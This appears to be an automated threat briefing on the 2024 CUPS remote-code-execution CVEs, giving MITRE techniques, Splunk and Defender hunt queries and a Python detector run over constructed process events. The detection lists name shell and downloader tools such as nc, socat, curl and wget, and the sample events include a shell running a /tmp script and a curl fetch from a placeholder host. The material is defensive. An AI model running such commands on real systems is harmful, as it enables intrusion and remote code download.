# [HIGH] Zero-day RCE vulnerability found in CUPS - Common UNIX Printing System

**Source:** Snyk
**Published:** 2024-09-27
**Article:** https://snyk.io/blog/zero-day-rce-in-cups-vulnerability-sept-2024/

## Threat Profile

Written by Jim Armstrong, September 27, 2024

On September 27, 2024, evilsocket.net (Simone Margaritelli) published information about several vulnerabilities in CUPS (Common UNIX Printing System), which can allow for arbitrary remote code execution (RCE). There are currently 4 CVEs associated with these findings, with potentially more on the way. There is also some debate about the severity of these vulnerabilities; however, one of the CVEs was initially give…

## Indicators of Compromise (high-fidelity only)

- **CVE:** `CVE-2024-47076`
- **CVE:** `CVE-2024-47175`
- **CVE:** `CVE-2024-47176`
- **CVE:** `CVE-2024-47177`

## MITRE ATT&CK Techniques

- **T1190** — Exploit Public-Facing Application
- **T1203** — Exploitation for Client Execution
- **T1059.004** — Command and Scripting Interpreter: Unix Shell
- **T1546** — Event Triggered Execution
- **T1027** — Obfuscated Files or Information

## Kill chain phases observed

_(none detected from narrative keywords)_

## Recommended hunts

### Inbound UDP/631 (CUPS IPP discovery) from external network

`UC_1134_1` · phase: **delivery** · confidence: **Medium** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Traffic.src) as src values(All_Traffic.bytes_in) as bytes_in from datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port=631 All_Traffic.transport=udp All_Traffic.src_category!=internal All_Traffic.action!=blocked by All_Traffic.dest All_Traffic.dest_port All_Traffic.transport | `drop_dm_object_name("All_Traffic")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
```

**Defender KQL:**
```kql
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where LocalPort == 631
| where Protocol =~ "Udp"
| where RemoteIPType == "Public"
| where ActionType in ("InboundConnectionAccepted","ConnectionInbound","ConnectionSuccess")
| project Timestamp, DeviceName, LocalIP, LocalPort, Protocol, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
```

### cups-browsed spawning foomatic-rip or shell child (CVE-2024-47177 RCE)

`UC_1134_2` · phase: **exploit** · confidence: **High** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process values(Processes.process_name) as process_name values(Processes.user) as user from datamodel=Endpoint.Processes where (Processes.parent_process_name IN ("cups-browsed","cupsd","foomatic-rip")) AND (Processes.process_name IN ("sh","bash","dash","foomatic-rip","curl","wget","python","python3","perl","nc","ncat")) by Processes.dest Processes.parent_process_name Processes.process_name Processes.process Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
```

**Defender KQL:**
```kql
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("cups-browsed","cupsd","foomatic-rip")
| where FileName in~ ("sh","bash","dash","foomatic-rip","curl","wget","python","python3","perl","nc","ncat","socat")
   or ProcessCommandLine has_any ("FoomaticRIPCommandLine","/tmp/","curl ","wget ","bash -c","sh -c")
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, FolderPath, SHA256
| order by Timestamp desc
```
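An offline version of the UC_1134_2 logic, added here as an example (it is not code from the Snyk article or from the hunt templates) so the parent/child and command-line conditions can be tested on constructed process events before being tuned in SPL or KQL. Hostnames, timestamps and command lines below are constructed; the `example.invalid` host is a placeholder.

```python
"""Hunt UC_1134_2 (cups-browsed/cupsd/foomatic-rip spawning a shell, interpreter
or downloader) expressed in Python over constructed process telemetry."""
from dataclasses import dataclass
import posixpath

# Parents that belong to the CUPS print pipeline (same set as the KQL hunt).
CUPS_PARENTS = {"cups-browsed", "cupsd", "foomatic-rip"}
# Children that are unusual for a print filter to spawn (same list as the KQL hunt).
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "foomatic-rip", "curl", "wget",
                       "python", "python3", "perl", "nc", "ncat", "socat"}
# Command-line fragments the KQL hunt keys on.
CMDLINE_MARKERS = ("FoomaticRIPCommandLine", "/tmp/", "curl ", "wget ", "bash -c", "sh -c")

@dataclass
class ProcessEvent:
    ts: str
    host: str
    parent: str   # parent image name or full path
    child: str    # child image name or full path
    cmdline: str
    user: str = "lp"

def _basename(name):
    return posixpath.basename(name).lower()

def match_cups_child(ev):
    """Return a reason string when the event matches the hunt, else None."""
    parent = _basename(ev.parent)
    if parent not in CUPS_PARENTS:
        return None
    child = _basename(ev.child)
    if child in SUSPICIOUS_CHILDREN:
        # cupsd -> foomatic-rip is normal on hosts with foomatic drivers; the chain
        # foomatic-rip/cups-browsed -> shell or downloader is what needs triage.
        return f"{parent} spawned {child}"
    hit = next((m for m in CMDLINE_MARKERS if m in ev.cmdline), None)
    return f"{parent} child command line contains {hit!r}" if hit else None

def hunt(events):
    return [(ev, r) for ev in events if (r := match_cups_child(ev))]

# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    ProcessEvent("2024-09-27T10:00:01Z", "print01", "/usr/sbin/cupsd", "/usr/lib/cups/filter/pdftopdf", "pdftopdf 42 lp job 1"),
    ProcessEvent("2024-09-27T10:00:02Z", "print01", "/usr/sbin/cupsd", "/usr/lib/cups/filter/foomatic-rip", "foomatic-rip 42 lp job 1"),
    ProcessEvent("2024-09-27T10:00:03Z", "print01", "foomatic-rip", "/bin/sh", "sh -c /tmp/.x/run.sh"),
    ProcessEvent("2024-09-27T10:05:00Z", "print01", "/usr/sbin/cups-browsed", "/usr/bin/curl", "curl http://example.invalid/p"),
    ProcessEvent("2024-09-27T10:06:00Z", "web01", "/usr/sbin/sshd", "/bin/bash", "bash -c id", user="admin"),
]

if __name__ == "__main__":
    for ev, reason in hunt(SAMPLE_EVENTS):
        print(ev.ts, ev.host, ev.user, reason)
```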

### cups-browsed writing new PPD or config under /etc/cups or /var/cache/cups

`UC_1134_3` · phase: **install** · confidence: **Medium** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.file_path) as file_path values(Filesystem.process_name) as process_name from datamodel=Endpoint.Filesystem where (Filesystem.file_path IN ("/etc/cups/ppd/*","/etc/cups/cups-browsed.conf*","/var/cache/cups/*","/etc/cups/printers.conf*")) AND Filesystem.process_name IN ("cups-browsed","cupsd") AND Filesystem.action=created by Filesystem.dest Filesystem.file_name Filesystem.process_name | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
```

**Defender KQL:**
```kql
DeviceFileEvents
| where Timestamp > ago(7d)
| where ActionType in ("FileCreated","FileModified","FileRenamed")
| where FolderPath startswith "/etc/cups/" or FolderPath startswith "/var/cache/cups/"
| where InitiatingProcessFileName in~ ("cups-browsed","cupsd")
| where FileName endswith ".ppd" or FileName has_any ("cups-browsed.conf","printers.conf")
| project Timestamp, DeviceName, FolderPath, FileName, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountName, SHA256
| order by Timestamp desc
```

### Linux assets with vulnerable CUPS packages and external exposure (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177)

`UC_1134_4` · phase: **recon** · confidence: **High** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count from datamodel=Vulnerabilities.Vulnerabilities where Vulnerabilities.cve IN ("CVE-2024-47175","CVE-2024-47176","CVE-2024-47177","CVE-2024-47076") by Vulnerabilities.dest Vulnerabilities.cve Vulnerabilities.signature Vulnerabilities.severity | `drop_dm_object_name("Vulnerabilities")`
```

**Defender KQL:**
```kql
let CupsCVEs = dynamic(["CVE-2024-47175","CVE-2024-47176","CVE-2024-47177","CVE-2024-47076"]);
DeviceTvmSoftwareVulnerabilities
| where CveId in (CupsCVEs)
| join kind=inner (
    DeviceInfo
    | summarize arg_max(Timestamp, *) by DeviceId
    | where IsInternetFacing == true or OSPlatform startswith "Linux"
  ) on DeviceId
| project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, RecommendedSecurityUpdate, IsInternetFacing
| order by IsInternetFacing desc, CveId asc
```

### IOC-driven hunts (use shared templates)

These are standard IOC-substitution hunts — the canonical SPL and KQL live once in [`_TEMPLATES.md`](../_TEMPLATES.md), so we don't repeat the same boilerplate on every CVE / hash / network-IOC briefing.

- **Asset exposure — vulnerability matches article CVE(s)** ([template](../_TEMPLATES.md#asset-exposure)) — phase: **recon**, confidence: **High**
  - CVE(s): `CVE-2024-47076`, `CVE-2024-47175`, `CVE-2024-47176`, `CVE-2024-47177`

## Why this matters

Severity classified as **HIGH** based on: CVE present, 5 use case(s) fired, 5 technique(s) inferred. Read the full article for actor attribution, tooling details, and any defanged IOCs in the body that aren't visible in the RSS summary.
